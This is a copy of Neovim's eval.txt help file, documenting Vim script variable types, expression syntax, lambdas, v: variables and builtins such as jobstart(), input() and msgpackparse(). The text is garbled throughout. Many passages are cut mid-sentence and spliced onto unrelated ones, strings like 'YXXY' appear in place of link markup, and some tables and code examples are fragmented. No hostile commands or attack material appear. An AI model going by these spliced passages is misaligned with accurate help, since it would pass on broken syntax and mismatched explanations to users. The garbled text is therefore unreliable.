*eval.txt* Nvim|. Type <M-]> to see the table of contents. ============================================================================== 1. Variables *variables* 1.1 Variable types *E712* There are six types of variables: Number A 32 or 64 bit signed number. |expr-number| *Number* 64-bit Number is available only when compiled with the |+num64| feature. Examples: -123 0x10 0177 0b1011 Float A floating point number. |floating-point-format| *Float* Examples: 123.456 1.15e-6 -1.1e3 *E928* String A NUL terminated string of 8-bit unsigned characters (bytes). |expr-string| Examples: "ab\txx\"--" 'x-z''a,c' Funcref A reference to a function |Funcref|. Example: function("strlen") It can be bound to a dictionary and arguments, it then works like a Partial. Example: function("Callback", [arg], myDict)", Octal "017", and Binary "0b10" numbers are recognized. If the String doesn't start with digits, the result is zero. Examples: String "456" --> Number 456 String "6bar" --> Number 6 String "foo" --> Number 0 String "0xf1" --> Number 241 String "0100" --> Number 64 String "0b101" --> Number 5 String "-8" --> Number -8 String "+8" --> Number 0 To force conversion from String to Number, add zero to it: :echo "0100" + 0 64 To avoid a leading zero to cause octal conversion, or for using a different base, use |str2nr()|. *TRUE* *FALSE* For boolean operators Numbers are used. Zero is FALSE, non-zero is TRUE. You can also use |v:false| and |v:true|. When TRUE is returned from a function it is the Number one, FALSE is the number zero. Note that in the command: :if "foo" :" NOT executed "foo" is converted to 0, which means FALSE. If the string starts with a non-zero number it means TRUE: :if "8foo" :" executed To test for a non-empty string, use empty(): :if !empty("foo") *non-zero-arg* Function arguments often behave slightly different from |TRUE|: If the argument is present and it evaluates to a non-zero Number, |v:true| or a non-empty String, then the value is considered to be TRUE. Note that " " and "0" are also non-empty strings, thus cause the mode to be cleared. A List, Dictionary or Float is not a Number or String, thus evaluates to FALSE. 891* *E892* *E893* *E894* When expecting a Float a Number can also be used, but nothing else. *no-type-checking* You will not get an error if you try to change the type of a variable. 1.2 Function references *Funcref* *E695* *E718* A Funcref variable is obtained with the |function()| function or created with the lambda expression |expr-lambda|. can use "g:" but the following name must still start with a capital.) *Partial* A Funcref optionally binds a Dictionary and/or arguments. This is also called a Partial. This is created by passing the Dictionary and/or arguments to function(). When calling the function the Dictionary and/or arguments will be passed to the function. Example: let Cb = function('Callback', ['foo'], myDict) call Cb() This will invoke the function as if using: call myDict.Callback('foo') Note that binding a function to a Dictionary also happens when the function is a member of the Dictionary: let myDict.myFunction = MyFunction call myDict.myFunction() Here MyFunction() will get myDict passed as "self". This happens when the "myFunction" member is accessed. When assigning "myFunction" to otherDict and calling it, it will be bound to otherDict: let otherDict.myFunction = myDict.myFunction call otherDict.myFunction() Now "self" will be "otherDict". But when the dictionary was bound explicitly this won't happen: let myDict.myFunction = function(MyFunction, myDict) let otherDict.myFunction = myDict.myFunction call otherDict.myFunction() Here "self" will be "myDict", because it was bound explicitly. 1.3 Lists *list* :call uniq(sort(list)) " sort and remove duplicates *Dict* *dict* '. The empty string can be used as a key.* *E862* 'shada' option, global variables that start with an uppercase letter, and don't contain a lowercase letter, are stored in the shada file |shada shada file It's possible to form a variable name with curly braces, see |curly-braces-names|. ============================================================================== 2. Expression syntax *expression-syntax* Expression syntax summary, from least to most significant: |expr1| expr2 expr2 ? expr1 : expr1 if-then-else |expr2| expr3 expr3 || expr3 .. logical OR |expr3| expr4 expr4 && expr4 .. logical AND |expr4| expr + expr6 .. number addition or list concatenation expr6 - expr6 .. number subtraction expr6 . expr6 .. string concatenation |expr6| expr7 expr7 * expr7 .. number multiplication expr7 / expr7 .. number division expr7 % expr7 .. number modulo |expr7| expr8 ! expr7 logical NOT - expr7 unary minus + expr7 unary plus |expr8| expr {args -> expr1} lambda expression ".." |TRUE|, |FALSE| |FALSE| |FALSE| |FALSE| |FALSE| |TRUE| |TRUE| |FALSE| |TRUE| |FALSE| |TRUE| |FALSE| |TRUE| |TRUE| |TRUE| |TRUE| |TRUE|, so the result must be |TRUE|.* *expr-isnot* *expr-is#* *expr-isnot#* *expr-is?* *expr-isnot?* use 'ignorecase' match case ignore case equal == ==# ==? not equal != !=# !=? greater than > ># >? greater than or equal >= >=# >=? smaller than < <# <? smaller than or equal <= <=# <=? regexp matches =~ =~# =~? regexp doesn't match !~ !~# !~? same instance is is# is? different instance isnot isnot#694* A |Funcref| can only be compared with a |Funcref| and only "equal", "not equal", "is" and "isnot" can be used. Case is never ignored. Whether arguments or a Dictionary are bound (with a partial) matters. The Dictionaries must also be equal (or the same, in case of "is") and the arguments must be equal (or the same). To compare Funcrefs to see if they refer to the same function, ignoring bound Dictionary and arguments, use |get()| to get the function name: if get(Part1, 'name') == get(Part2, 'name') " Part1 and Part2 refer to the same function When using "is" or "isnot" with a |List| or a |Dictionary| this checks if the expressions are referring to the same |List| or |Dictionary| instance. A copy of a |List| is different from the original |List|. When using "is" without a |List| or a |Dictionary| it is equivalent to using "equal", using "isnot" equivalent to using "not equal". Except that a different type means the values are different: echo 4 == '4' 1 echo 4 is '4' 0 echo 0 is [] 0 "is#"/"isnot#" and "is?"/"isnot?" can be used to match and ignore case. When comparing a String with a Number, the String is converted to a Number, and the comparison is done on Numbers. This means that: echo 0 == 'x' 1 because 'x' converted to a Number is zero. However: echo [0] == ['x'] 0 Inside a List or Dictionary this conversion is not used.. For bitwise operators see |and()|, |or()| and |xor()|. 64-bit Number support is enabled: 0 / 0 = -0x8000000000000000 (like NaN for Float) >0 / 0 = 0x7fffffffffffffff (like positive infinity) <0 / 0 = -0x7fffffffffffffff (like negative infinity) '!' |TRUE| becomes |FALSE|, |FALSE| becomes |TRUE| * *subscript*, or use `split()` to turn the string into a list of characters. Index zero gives the first byte. This is like it works in C. Careful: text column numbers start with one! Example, to get the byte under the cursor: :let c = getline(".")[col(".") - 1] If the length of the String is less than the index, the result is an empty String. A negative index always results in an empty string (reason: backward *slice* If expr8 is a |List| this results in a new |List| with the items indicated by the indexes expr1a and expr1b. This works like with a String, as explained just above. Also see |sublist| below.. Watch out for confusion between a namespace and a variable followed by a colon for a sublist: mylist[n:] " uses variable n mylist[s:] " uses namespace* *hex-number* *octal-number* *binary-number* Decimal, Hexadecimal (starting with 0x or 0X), Binary (starting with 0b or 0B) and Octal (starting with 0). *floating-point-format* Floating point numbers can be written in two forms: [-+]{N}.{M} [-+]{N}.{M}[eE][-+] *string* as UTF-8 (e.g., "\u02a4") \U.... same as \u but allows up to 8 hex numbers. correctly as UTF-8. $shell :echo expand("$shell") The first one probably doesn't echo anything, the second echoes the $shell variable (if your shell supports it). internal variable *expr-variable* variable internal variable See below |internal-variables|. function call *expr-function* *E116* *E118* *E119* *E120* function(expr1, ...) function call See below |functions|. lambda expression *expr-lambda* *lambda* {args -> expr1} lambda expression A lambda expression creates a new unnamed function which returns the result of evaluating |expr1|. Lambda expressions differ from |user-functions| in the following ways: 1. The body of the lambda expression is an |expr1| and not a sequence of |Ex| commands. 2. The prefix "a:" should not be used for arguments. E.g.: :let F = {arg1, arg2 -> arg1 - arg2} :echo F(5, 2) 3 The arguments are optional. Example: :let F = {-> 'error function'} :echo F() error function *closure* Lambda expressions can access outer scope variables and arguments. This is often called a closure. Example where "i" and "a:arg" are used in a lambda while they exist in the function scope. They remain valid even after the function returns: :function Foo(arg) : let i = 3 : return {x -> x + i - a:arg} :endfunction :let Bar = Foo(4) :echo Bar(6) 5 See also |:func-closure|. Lambda and closure support can be checked with: if has('lambda') Examples for using a lambda expression with |sort()|, |map()| and |filter()|: :echo map([1, 2, 3], {idx, val -> val + 1}) [2, 3, 4] :echo sort([3,7,2,1,4], {a, b -> a - b}) [1, 2, 3, 4, 7] The lambda expression is also useful for jobs and timers: :let timer = timer_start(500, \ {-> execute("echo 'Handler called'", "")}, \ {'repeat': 3}) Handler called Handler called Handler called Note how execute() is used to execute an Ex command. That's ugly though. Lambda expressions have internal names like '<lambda>42'. If you get an error for a lambda expression, you can find what it is with the following command: :function {'<lambda>42'} See also: |numbered-function| ==============================================================================* *b:* You cannot change or delete the b:changedtick variable. *window-variable* *w:var* *w:* A variable name that is preceded with "w:" is local to the current window. It is deleted when the window is closed. *tabpage-variable* *t:var* *t:* A variable name that is preceded with "t:" is local to the current tab page, It is deleted when the tab page is closed. {not available when compiled without the |+windows| feature} *global-variable* *g:var* *g:* Inside functions global variables are accessed with "g:". Omitting this will access a variable local to a function. But "g:" can also be used in any other place if you like. *local-variable* *l:var* *l:*:beval_winid* *beval_winid-variable* v:beval_winid The |window-ID| of the window, over which the mouse pointer is. Otherwise like v:beval_winnr. *v:char* *char-variable* v:char Argument for evaluating 'formatexpr' and used for the typed character when using <expr> in an abbreviation |:map-<expr>|. It is also used by the |InsertCharPre| and |InsertEnter| events. :completed_item* *completed_item-variable* v:completed_item Dictionary containing the most recent |complete-items| after |CompleteDone|. Empty if the completion failed, or after leaving and re-entering insert mode. :exiting* *exiting-variable* v:exiting Exit code, or |v:null| if not exiting. |VimLeave| *v:errmsg* *errmsg-variable* v:errmsg Last given error message. It's allowed to set this variable. Example: :let v:" debug command history empty the current or last used history The {history} string does not need to be the whole name, one character is sufficient. |TRUE|, ignore case. Otherwise case must match. -1 is returned when {expr} is not found in {list}. Example: :let idx = index(words, "the") :if index(numbers, 123) >= 0 input({prompt} [, {text} [, {completion}]]) *input()* input({opts}) The result is a String, which is whatever the user typed on the command-line. The {prompt} argument is either a prompt string, or a blank string (for no prompt). A '\n' can be used in the prompt to start a new line. In the second form it accepts a single dictionary with the following keys, any of which may be omitted: Key Default Description prompt "" Same as {prompt} in the first form. default "" Same as {text} in the first form. completion nothing Same as {completion} in the first form. cancelreturn "" Same as {cancelreturn} from |inputdialog()|. Also works with input(). highlight nothing Highlight handler: |Funcref|.") *input()-highlight* *E5400* *E5402* The optional `highlight` key allows specifying function which will be used for highlighting user input. This function receives user input as its only argument and must return a list of 3-tuples [hl_start_col, hl_end_col + 1, hl_group] where hl_start_col is the first highlighted column, hl_end_col is the last highlighted column (+ 1!), hl_group is |:hl| group used for highlighting. *E5403* *E5404* *E5405* *E5406* Both hl_start_col and hl_end_col + 1 must point to the start of the multibyte character (highlighting must not break multibyte characters), hl_end_col + 1 may be equal to the input length. Start column must be in range [0, len(input)), end column must be in range (hl_start_col, len(input)], sections must be ordered so that next hl_start_col is greater then or equal to previous hl_end_col. Example (try some input with parentheses): highlight RBP1 guibg=Red ctermbg=red highlight RBP2 guibg=Yellow ctermbg=yellow highlight RBP3 guibg=Green ctermbg=green highlight RBP4 guibg=Blue ctermbg=blue let g:rainbow_levels = 4 function! RainbowParens(cmdline) let ret = [] let i = 0 let lvl = 0 while i < len(a:cmdline) if a:cmdline[i] is# '(' call add(ret, [i, i + 1, 'RBP' . ((lvl % g:rainbow_levels) + 1)]) let lvl += 1 elseif a:cmdline[i] is# ')' let lvl -= 1 call add(ret, [i, i + 1, 'RBP' . ((lvl % g:rainbow_levels) + 1)]) endif let i += 1 endwhile return ret endfunction call input({'prompt':'>','highlight':'RainbowParens'}) Highlight function is called at least once for each new displayed input string, before command-line is redrawn. It is expected that function is pure for the duration of one input() call, i.e. it produces the same output for the same input, so output may be memoized. Function is run like under |:silent| modifier. If the function causes any errors, it will be skipped for the duration of the current input() call. Currently coloring is disabled when command-line contains arabic characters.()* inputdialog({opts}) Like |input()|, but when the GUI is running and text dialogs are supported, a dialog window pops up to input the text. Example: :let n = inputdialog("value for shiftwidth", shiftwidth()) :if n != "" : let &sw = n :endif When the dialog is cancelled {cancelreturn} is returned. When omitted an empty string is returned. Hitting <Enter> works like pressing the OK button. Hitting <Esc> works like pressing the Cancel button.|. invert({expr}) *invert()* Bitwise invert. The argument is converted to a number. A List, Dict or Float argument causes an error. Example: :let bits = invert(bits) isdirectory({directory}) *isdirectory()* The result is a Number, which is |TRUE| when a directory with the name {directory} exists. If {directory} doesn't exist, or isn't a directory, the result is |FALSE|. {directory} is any expression, which is used as a String. islocked({expr}) *islocked()* *E786* The result is a Number, which is |TRUE|. id({expr}) *id()* Returns a |String| which is a unique identifier of the container type (|List|, |Dict| and |Partial|). It is guaranteed that for the mentioned types `id(v1) ==# id(v2)` returns true iff `type(v1) == type(v2) && v1 is v2` (note: |v:_null_list| and |v:_null_dict| have the same `id()` with different types because they are internally represented as a NULL pointers). Currently `id()` returns a hexadecimal representanion of the pointers to the containers (i.e. like `0x994a40`), same as `printf("%p", {expr})`, but it is advised against counting on exact format of return value. It is not guaranteed that `id(no_longer_existing_container)` will not be equal to some other `id()`: new containers may reuse identifiers of the garbage-collected ones. items({dict}) *items()* Return a |List| with all the key-value pairs of {dict}. Each |List| item is a list with two items: the key of a {dict} entry and the value of this entry. The |List| is in arbitrary order. jobclose({job}[, {stream}]) {Nvim} *jobclose()* Close {job}'s {stream}, which can be one of "stdin", "stdout", "stderr" or "rpc" (closes the rpc channel for a job started with the "rpc" option.) If {stream} is omitted, all streams are closed. If the job is a pty job, this will then close the pty master, sending SIGHUP to the job process. jobpid({job}) {Nvim} *jobpid()* Return the pid (process id) of {job}. jobresize({job}, {width}, {height}) {Nvim} *jobresize()* Resize {job}'s pseudo terminal window to {width} and {height}. This function will fail if used on jobs started without the "pty" option. jobsend({job}, {data}) {Nvim} *jobsend()* Send data to {job} by writing it to the stdin of the process. Returns 1 if the write succeeded, 0 otherwise. See |job-control| for more information. {data} may be a string, string convertible, or a list. If {data} is a list, the items will be separated by newlines and any newlines in an item will be sent as a NUL. A final newline can be sent by adding a final empty string. For example: :call jobsend(j, ["abc", "123\n456", ""]) will send "abc<NL>123<NUL>456<NL>". If the job was started with the rpc option this function cannot be used, instead use |rpcnotify()| and |rpcrequest()| to communicate with the job. jobstart({cmd}[, {opts}]) {Nvim} *jobstart()* Spawns {cmd} as a job. If {cmd} is a |List| it is run directly. If {cmd} is a |String| it is processed like this: :call jobstart(split(&shell) + split(&shellcmdflag) + ['{cmd}']) (Only shows the idea; see |shell-unquoting| for full details.) NOTE: on Windows if {cmd} is a List: - cmd[0] must be an executable (not a "built-in"). If it is in $PATH it can be called by name, without an extension: :call jobstart(['ping', 'neovim.io']) If it is a full or partial path, extension is required: :call jobstart(['System32\ping.exe', 'neovim.io']) - {cmd} is collapsed to a string of quoted args as expected by CommandLineToArgvW unless cmd[0] is some form of "cmd.exe". {opts} is a dictionary with these keys: |on_stdout|: stdout event handler (function name or |Funcref|) |on_stderr|: stderr event handler (function name or |Funcref|) |on_exit| : exit event handler (function name or |Funcref|) cwd : Working directory of the job; defaults to |current-directory|. rpc : If set, |msgpack-rpc| will be used to communicate with the job over stdin and stdout. "on_stdout" is then ignored, but "on_stderr" can still be used. pty : If set, the job will be connected to a new pseudo terminal, and the job streams are connected to the master file descriptor. "on_stderr" is ignored as all output will be received on stdout. width : (pty only) Width of the terminal screen height : (pty only) Height of the terminal screen TERM : (pty only) $TERM environment variable detach : (non-pty only) Detach the job process from the nvim process. The process will not get killed when nvim exits. If the process dies before nvim exits, on_exit will still be invoked. {opts} is passed as |self| to the callback; the caller may pass arbitrary data by setting other keys. Returns: - The job ID on success, which is used by |jobsend()| (or |rpcnotify()| and |rpcrequest()| if "rpc" option was used) and |jobstop()| - 0 on invalid arguments or if the job table is full - -1 if {cmd}[0] is not executable. See |job-control| and |msgpack-rpc| for more information. jobstop({job}) {Nvim} *jobstop()* Stop a job created with |jobstart()| by sending a `SIGTERM` to the corresponding process. If the process doesn't exit cleanly soon, a `SIGKILL` will be sent. When the job is finally closed, the exit handler provided to |jobstart()| or |termopen()| will be run. See |job-control| for more information. jobwait({ids}[, {timeout}]) {Nvim} *jobwait()* Wait for a set of jobs to finish. The {ids} argument is a list of ids for jobs that will be waited for. If passed, {timeout} is the maximum number of milliseconds to wait. While this function is executing, callbacks for jobs not in the {ids} list can be executed. Also, the screen wont be updated unless |:redraw| is invoked by one of the callbacks. Returns a list of integers with the same length as {ids}, with each integer representing the wait result for the corresponding job id. The possible values for the resulting integers are: * the job return code if the job exited * -1 if the wait timed out for the job * -2 if the job was interrupted * -3 if the job id is invalid.()|. json_decode({expr}) *json_decode()* Convert {expr} from JSON object. Accepts |readfile()|-style list as the input, as well as regular string. May output any Vim value. In the following cases it will output YXXYmsgpack-special-dict|: 1. Dictionary contains duplicate key. 2. Dictionary contains empty key. 3. String contains NUL byte. Two special dictionaries: for dictionary and for string will be emitted in case string with NUL byte was a dictionary key. Note: function treats its input as UTF-8 always. The JSON standard allows only a few encodings, of which UTF-8 is recommended and the only one required to be supported. Non-UTF-8 characters are an error. json_encode({expr}) *json_encode()* Convert {expr} into a JSON string. Accepts |msgpack-special-dict| as the input. Will not convert |Funcref|s, mappings with non-string keys (can be created as |msgpack-special-dict|), values with self-referencing containers, strings which contain non-UTF-8 characters, pseudo-UTF-8 strings which contain codepoints reserved for surrogate pairs (such strings are not valid UTF-8 strings). Non-printable characters are converted into "\u1234" escapes or special escapes like "\t", other are dumped as-is.. UTF-8 encoding is used, 'fileencoding' is ignored. This can also be used to get the byte count for the line just below the last line: line2byte(line("$") + 1) This is the buffer size plus one. If 'fileencoding' is empty it is the file size plus one. When {lnum} is invalid log10({expr}) *log10()* Return the logarithm of Float {expr} to base 10 as a |Float|. {expr} must evaluate to a |Float| or a |Number|. Examples: :echo log10(1000) 3.0 :echo log10(0.01) -2.0 luaeval({expr}[, {expr}]) Evaluate Lua expression {expr} and return its result converted to Vim data structures. See |lua-luaeval| for more details. map({expr1}, {expr2}) *map()* {expr1} must be a |List| or a |Dictionary|. Replace each item in {expr1} with the result of evaluating {expr2}. {expr2} is the result of an expression and is then used as an expression again. Often it is good to use a |literal-string| to avoid having to double backslashes. You still have to double '' quotes YXXYlambda|: call map(myDict, {key, val -> key . '-' . val}) If you do not use "val" you can leave it out: call map(myDict, {key -> 'item: ' . key}) The operation is done in-place. If you want a |List| or |Dictionary| to remain unmodified make a copy first: :let tlist = map(copy(mylist), ' v:val . "\t"') Returns {expr1}, the |List| or |Dictionary| that was filtered. When an error is encountered while evaluating {expr2} no further items in {expr1} are processed. When {expr2} is a Funcref errors inside a function are ignored, unless it was defined with the "abort" flag. |TRUE| use abbreviations instead of mappings. When {dict} is there and it is |TRUE|>|). "nowait" Do not wait for other, longer mappings. (|:map-<nowait>|).. For getting submatches see |matchlist()|.} [, {dict}]]]) Defines a pattern to be highlighted in the current window (a "match"). It will be highlighted with {group}. Returns an identification number (ID), which can be used to delete the match using |matchdelete()|. Matching is case sensitive and magic, unless case sensitivity or magicness are explicitly overridden in {pattern}. The 'magic', 'smartcase' and 'ignorecase' options are not used. The "Conceal" value is special, it causes the match to be concealed. or -1, |matchadd()| automatically chooses a free ID. The optional {dict} argument allows for further custom values. Currently this is used to specify a match specific conceal character that will be shown for |hl-Conceal| highlighted matches. The dict can have the following members: conceal Special character to show instead of the match (only for |hl-Conceal| highlighed matches, see |:syn-cchar|)addpos()* matchaddpos({group}, {pos}[, {priority}[, {id}[, {dict}]]]) Same as |matchadd()|, but requires a list of positions {pos} instead of a pattern. This command is faster than |matchadd()| because it does not require to handle regular expressions and sets buffer line boundaries to redraw screen. It is supposed to be used when fast match additions and deletions are required, for example to highlight matching parentheses. The list {pos} can contain one of these items: - A number. This whole line will be highlighted. The first line has number 1. - A list with one number, e.g., [23]. The whole line with this number will be highlighted. - A list with two numbers, e.g., [23, 11]. The first number is the line number, the second one is the column number (first column is 1, the value must correspond to the byte index as |col()| would return). The character at this position will be highlighted. - A list with three numbers, e.g., [23, 11, 3]. As above, but the third number gives the length of the highlight in bytes. The maximum number of positions is 8. Example: :highlight MyGroup ctermbg=green guibg=green :let m = matchaddpos("MyGroup", [[23, 24], 34]) Deletion of the pattern: :call matchdelete(m) Matches added by |matchaddpos()| are returned by |getmatches()| with an entry "pos1", "pos2", etc., with the value a list like the {pos} item. These matches cannot be set via |setmatches()|, however they can still be deleted. matchstrpos({expr}, {pat}[, {start}[, {count}]]) *matchstrpos()* Same as |matchstr()|, but return the matched string, the start position and the end position of the match. Example: :echo matchstrpos("testing", "ing") results in ["ing", 4, 7]. When there is no match ["", -1, -1] is returned. The {start}, if given, has the same meaning as for |match()|. :echo matchstrpos("testing", "ing", 2) results in ["ing", 4, 7]. :echo matchstrpos("testing", "ing", 5) result is ["", -1, -1]. When {expr} is a |List| then the matching item, the index of first item where {pat} matches, the start position and the end position of the match are returned. :echo matchstrpos([1, '__x'], '\a') result is ["x", 1, 2, 3]. The type isn't changed, it's not necessarily a String. *max()* max({expr}) Return the maximum value of all items in {expr}. {expr} can be a list or a dictionary. For a dictionary, it returns the maximum of all values in the dictionary. If {expr} is neither a list nor a dictionary, or one of the items in {expr} cannot be used as a Number this results in an error. An empty |List| or |Dictionary| results in zero. menu_get({path}, {modes}) *menu_get()* Returns a |List| of |Dictionaries| describing |menus| (defined by |:menu|, |:amenu|, etc.). {path} limits the result to a subtree of the menu hierarchy (empty string matches all menus). E.g. to get items in the "File" menu subtree: :echo menu_get('File','') {modes} is a string of zero or more modes (see |maparg()| or |creating-menus| for the list of modes). "a" means "all". For example: nnoremenu &Test.Test inormal inoremenu Test.Test insert vnoremenu Test.Test x echo menu_get("") returns something like this: [ { "hidden": 0, "name": "Test", "priority": 500, "shortcut": 84, "submenus": [ { "hidden": 0, "mappings": { i": { "enabled": 1, "noremap": 1, "rhs": "insert", "sid": 1, "silent": 0 }, n": { ... }, s": { ... }, v": { ... } }, "name": "Test", "priority": 500, "shortcut": 0 } ] } ] *min()* min({expr}) Return the minimum value of all items in {expr}. {expr} can be a list or a dictionary. For a dictionary, it returns the minimum of all values in the dictionary. If {expr} is neither a list nor a dictionary, or one of the items in {expr} cannot be used as a Number this results in an error. An empty |List| or |Dictionary|. {Nvim} {prot} is applied for all parts of {name}. Thus if you create /tmp/foo/bar then /tmp/foo will be created with 0700. Example: :call mkdir($HOME . "/tmp/foo/bar", "p", 0700) This function is not available in the |sandbox|. If you try to create an existing directory with {path} set to "p" mkdir() will silently exit. *mode()* mode([expr]) Return a string that indicates the current mode. If [expr] is supplied and it evaluates to a non-zero Number or a non-empty String (|non-zero-arg|), then the full mode is returned, otherwise only the first letter is returned. n Normal no Operator-pending v Visual by character V Visual by line CTRL-V Visual blockwise s Select by character S Select by line CTRL-S Select blockwise i Insert R Replace |R| Rv Virtual Replace |gR| t Terminal {Nvim}()|. msgpackdump({list}) {Nvim} *msgpackdump()* Convert a list of VimL objects to msgpack. Returned value is |readfile()|-style list. Example: call writefile(msgpackdump([{}]), 'fname.mpack', 'b') This will write the single 0x80 byte to `fname.mpack` file (dictionary with zero items is represented by 0x80 byte in messagepack). Limitations: *E5004* *E5005* 1. |Funcref|s cannot be dumped. 2. Containers that reference themselves cannot be dumped. 3. Dictionary keys are always dumped as STR strings. 4. Other strings are always dumped as BIN strings. 5. Points 3. and 4. do not apply to |msgpack-special-dict|s. msgpackparse({list}) {Nvim} *msgpackparse()* Convert a |readfile()|-style list to a list of VimL objects. Example: let fname = expand('~/.config/nvim/shada/main.shada') let mpack = readfile(fname, 'b') let shada_objects = msgpackparse(mpack) This will read ~/.config/nvim/shada/main.shada file to `shada_objects` list. Limitations: 1. Mapping ordering is not preserved unless messagepack mapping is dumped using generic mapping (|msgpack-special-map|). 2. Since the parser aims to preserve all data untouched (except for 1.) some strings are parsed to |msgpack-special-dict| format which is not convenient to use. *msgpack-special-dict* Some messagepack strings may be parsed to special dictionaries. Special dictionaries are dictionaries which 1. Contain exactly two keys: `_TYPE` and `_VAL`. 2. `_TYPE` key is one of the types found in |v:msgpack_types| variable. 3. Value for `_VAL` has the following format (Key column contains name of the key from |v:msgpack_types|): Key Value nil Zero, ignored when dumping. This value cannot possibly appear in |msgpackparse()| output in Neovim versions which have |v:null|. boolean One or zero. When dumping it is only checked that value is a |Number|. This value cannot possibly appear in |msgpackparse()| output in Neovim versions which have |v:true| and |v:false|. integer |List| with four numbers: sign (-1 or 1), highest two bits, number with bits from 62nd to 31st, lowest 31 bits. I.e. to get actual number one will need to use code like _VAL[0] * ((_VAL[1] << 62) & (_VAL[2] << 31) & _VAL[3]) Special dictionary with this type will appear in |msgpackparse()| output under one of the following circumstances: 1. |Number| is 32-bit and value is either above INT32_MAX or below INT32_MIN. 2. |Number| is 64-bit and value is above INT64_MAX. It cannot possibly be below INT64_MIN because msgpack C parser does not support such values. float |Float|. This value cannot possibly appear in |msgpackparse()| output. string |readfile()|-style list of strings. This value will appear in |msgpackparse()| output if string contains zero byte or if string is a mapping key and mapping is being represented as special dictionary for other reasons. binary |readfile()|-style list of strings. This value will appear in |msgpackparse()| output if binary string contains zero byte. array |List|. This value cannot appear in |msgpackparse()| output. *msgpack-special-map* map |List| of |List|s with two items (key and value) each. This value will appear in |msgpackparse()| output if parsed mapping contains one of the following keys: 1. Any key that is not a string (including keys which are binary strings). 2. String with NUL byte inside. 3. Duplicate key. 4. Empty key. ext |List| with two values: first is a signed integer representing extension type. Second is |readfile()|-style list of strings.}[, {utf8}]) *nr2char()* Return a string with a single character, which has the number value {expr}. Examples: nr2char(64) returns "@" nr2char(32) returns " " Example for "utf-8": nr2char(300) returns I with bow character UTF-8 encoding is always used, {utf8} option has no effect, and exists only for backwards-compatibility. Note that a NUL character in the file is specified with nr2char(10), because NULs are represented with newline characters. nr2char(0) is a real NUL and terminates the string, thus results in an empty string. nvim_...({...}) *nvim_...()* *eval-api* Call nvim |api| functions. The type checking of arguments will be stricter than for most other builtins. For instance, if Integer is expected, a |Number| must be passed in, a |String| will not be autoconverted. Buffer numbers, as returned by |bufnr()| could be used as first argument to nvim_buf_... functions. All functions expecting an object (buffer, window or tabpage) can also take the numerical value 0 to indicate the current (focused) object. or({expr}, {expr}) *or()* Bitwise OR on the two arguments. The arguments are converted to a number. A List, Dict or Float argument causes an error. Example: :let bits = or(bits, 0x80) pathshorten({expr}) *pathshorten()* Shorten directory names in the path {expr} and return the result. The tail, the file name, is kept as-is. The other components in the path are reduced to single letters. Leading '~' and '.' characters are kept. Example: :echo pathshorten('~/.config/nvim/autoload/file1.vim') ~/.v/a/file1 display cells %6s string right-aligned in 6 bytes %.9s string truncated to 9 bytes %c single byte %d decimal number %5d decimal number padded with spaces to 5 characters %b binary number %08b binary number padded with zeros to at least 8 characters %B binary number using upper case letters %x hex number %04x hex number padded with zeros to at least 4 characters %X hex number using upper case letters %o octal number %f floating point number as 12.23, inf, -inf or nan %F floating point number as 12.23, INF, -INF or NAN %e floating point number as 1.23e3, inf, -inf or nan %E floating point number as 1.23E3, INF, -INF or NAN %g floating point number, as %f or %e depending on value %G floating point number, as %F or %E depending on value %% the % character itself %p representation of the pointer to the container-b* *printf-B* *printf-o* *printf-x* *printf-X* dbBoxX The Number argument is converted to signed decimal (d), unsigned binary (b and. The 'h' modifier indicates the argument is 16 bits. The 'l' modifier indicates the argument is 32 bits. The 'L' modifier indicates the argument is 64 bits. Generally, these modifiers are not useful. They are ignored when type is known from the argument. i alias for d D alias for ld U alias for lu O alias for lo *printf-c* c The Number argument is converted to a byte, and the resulting character is written. *printf-s* s The text of the String argument is used. If a precision is specified, no more bytes than the number specified are used. If the argument is not a String type, it is automatically converted to text with the same format as ":echo". *printf-S* S The text of the String argument is used. If a precision is specified, no more display cells than the number specified are used. Without the |+multi_byte| feature works just like 's'. *printf-f* *E807* f" or "-inf" with %f (INF or -INF with %F). "0.0 / 0.0" results in "nan" with %f (NAN with %F).. py3eval({expr}) *py3eval()* Evaluate Python expression {expr} and return its result converted to Vim data structures. Numbers and strings are returned as they are (strings are copied though, Unicode strings are additionally converted to UTF-8). Lists are represented as Vim |List| type. Dictionaries are represented as Vim |Dictionary| type with keys converted to strings. {only available when compiled with the |+python3| feature} *E858* *E859* pyeval({expr}) *pyeval()* Evaluate Python expression {expr} and return its result converted to Vim data structures. Numbers and strings are returned as they are (strings are copied though). Lists are represented as Vim |List| type. Dictionaries are represented as Vim |Dictionary| type, non-string keys result in error. {only available when compiled with the |+python| feature} are broken at NL characters. Macintosh files separated with CR will result in a single long line (unless a NL appears somewhere). All NUL characters are replaced with a NL character. When {binary} contains or |reltimefloat()| to convert to a float. Without an argument it returns the current "relative time", an implementation-defined value meaningful only when used as an argument to |reltime()|, |reltimestr()| and |reltimefloat()|. With one argument it returns the time passed since the time specified in the argument. With two arguments it returns the time passed between {start} and {end}. The {start} and {end} arguments must be values returned by reltime(). Note: |localtime()| returns the current (non-relative) time. reltimefloat({time}) *reltimefloat()* Return a Float that represents the time value of {time}. Unit of time is seconds. Example: let start = reltime() call MyFunction() let seconds = reltimefloat(reltime(start)) See the note of reltimestr() about overhead. Also see |profiling|.. Leading spaces are used to make the string align nicely. You can use split() to remove it. echo split(reltimestr(reltime(start)))[0] Also see |profiling|. GUI rpcnotify({channel}, {event}[, {args}...]) {Nvim} *rpcnotify()* Sends {event} to {channel} via |RPC| and returns immediately. If {channel} is 0, the event is broadcast to all channels. Example: :au VimLeave call rpcnotify(0, "leaving") rpcrequest({channel}, {method}[, {args}...]) {Nvim} *rpcrequest()* Sends a request to {channel} to invoke {method} via |RPC| and blocks until a response is received. Example: :let result = rpcrequest(rpc_chan, "func", 1, 2, 3) rpcstart({prog}[, {argv}]) {Nvim} *rpcstart()* Deprecated. Replace :let id = rpcstart('prog', ['arg1', 'arg2']) with :let id = jobstart(['prog', 'arg1', 'arg2'], {'rpc': v:true}) rpcstop({channel}) {Nvim} *rpcstop()* Closes an |RPC| {channel}. If the channel is a job started with |jobstart()| the job is killed. It is better to use |jobstop()| in this case, or use |jobclose|(id, "rpc") to only close the channel without killing the job. Closes the socket connection if the channel was opened by connecting to |v:servername|. screenattr(row, col) *screenattr()* Like |screenchar()|, but return the attribute. This is a rather arbitrary number that can only be used to compare to the attribute at other positions. screenchar(row, col) *screenchar()* The result is a Number, which is the character at position [row, col] on the screen. This works for every possible screen position, also status lines, window separators and the command line. The top left position is row one, column one The character excludes composing characters. For double-byte encodings it may only be the first byte. This is mainly to be used for testing. Returns -1 when row or col is out of range. screencol() *screencol()* The result is a 